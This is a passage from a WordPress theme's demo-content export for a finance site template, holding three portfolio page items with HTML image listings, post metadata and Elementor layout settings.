				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>847</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:25:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:25:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-grid]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"0238f9e","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"513ab33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e2dfe3b","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"5d7a201","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"position":"","filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#52C5B699"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:21:"overlay_style_section";a:2:{s:8:"position";i:1;s:18:"overlay_background";i:1;}s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Masonry</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio-masonry/</link>
		<pubDate>Fri, 11 Sep 2020 07:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=858</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">
				<img width="1420" height="1420" src="https://maxbizz.s3.amazonaws.com/images/project1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">
				<img width="1420" height="1630" src="https://maxbizz.s3.amazonaws.com/images/project2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project2-1-261x300.jpg 261w, https://maxbizz.s3.amazonaws.com/images/project2-1-892x1024.jpg 892w, https://maxbizz.s3.amazonaws.com/images/project2-1-768x882.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project2-1-1338x1536.jpg 1338w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">
				<img width="719" height="719" src="https://maxbizz.s3.amazonaws.com/images/project-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">
				<img width="719" height="797" src="https://maxbizz.s3.amazonaws.com/images/project-4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-4-1-271x300.jpg 271w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">
				<img width="605" height="605" src="https://maxbizz.s3.amazonaws.com/images/project-6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/">
				<img width="605" height="736" src="https://maxbizz.s3.amazonaws.com/images/project-5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-5-1-247x300.jpg 247w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>858</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-masonry]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"26ace0b","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"eee344b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"df7a7a2","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"32a1880","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","style":"p-masonry","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#52C5B699"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"style";i:1;s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}s:21:"overlay_style_section";a:1:{s:18:"overlay_background";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Carousel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio-carousel/</link>
		<pubDate>Fri, 11 Sep 2020 07:47:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=861</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-2.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-3.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-4.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-5.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-finance/portfolio-cat/strategy/">strategy</a></p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>861</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:47:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:47:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-carousel]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"a208449","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"170","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"120","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e6f2aa0","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"444437c","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"01f9e90","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"d3bcd52","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"cadf2c3","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"c55927b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can 